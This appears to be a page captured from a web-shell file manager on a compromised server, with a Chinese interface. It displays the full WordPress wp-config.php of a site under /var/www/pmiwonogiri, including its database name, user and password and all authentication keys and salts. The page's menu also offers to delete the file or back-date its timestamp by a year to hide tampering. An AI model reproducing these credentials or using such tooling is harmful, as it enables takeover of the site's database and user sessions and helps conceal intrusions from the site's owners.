文件操作 - wp-config.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/pmiwonogiri/wp-config.php
编辑文件内容
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'pmi_db' ); /** Database username */ define( 'DB_USER', 'pmi_wonogiri' ); /** Database password */ define( 'DB_PASSWORD', 'UB39604jmUrLrg0SnCf7D73EwK' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'TKv38a~?p%Isz]!J.0o{Js1q_+7z{yPNyA(oJ9.BxNa]ZvE?eC{7+8~0A[qYT<4q' ); define( 'SECURE_AUTH_KEY', '@m$2JI}p/7U9}Yw<WU_J0ZDNq6*PV{4ys4y7*<USP5^asPcyo(Wp qIKPR;bP7Vt' ); define( 'LOGGED_IN_KEY', 'q8#niT>yrAD81Dw0m>*$L}cw19j/|sUqpL+*ahnrDCvHZX*IN+KzR|Vln|+1|C9a' ); define( 'NONCE_KEY', 'XvisFu2BsSYU1_[mjmNtx_tSKx{>SfAM61aoE@8r@` yI[4=fdLMcEnd$Z0h9jgl' ); define( 'AUTH_SALT', 'Q+T9k[J)oE~/2~A``!Eb8o3qhA;kDvPGTd =+[%!L2^`$~|oj^S$*bsW+#If~~kF' ); define( 'SECURE_AUTH_SALT', 'JLV2DTn!5@MNno6fw&K(L,;9m%G,/Z6=F;zF(t6d+y>#KEgIPvv4JZj8OL`2~^dx' ); define( 'LOGGED_IN_SALT', '{cB8F}VSb[_s(w<ATL#wZ3!gS2jMl(x6<6(q3>hgGyh=&#DB#^v@d2jH@v1$rIK}' ); define( 'NONCE_SALT', 's<N.8Z1+$o?gKH|d,=RD^4.QJ(h$AxHTgruo=cD,J!:mV{u)g5Y[Mfp *-tXP]|P' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'pmiw_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define('FS_METHOD', 'direct'); define('WP_OEMBED_CACHE_TIME', 3600); @ini_set('upload_max_filesize', '4M'); @ini_set('post_max_size', '12M'); @ini_set('max_execution_time', '300'); define('DISALLOW_FILE_EDIT', true); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件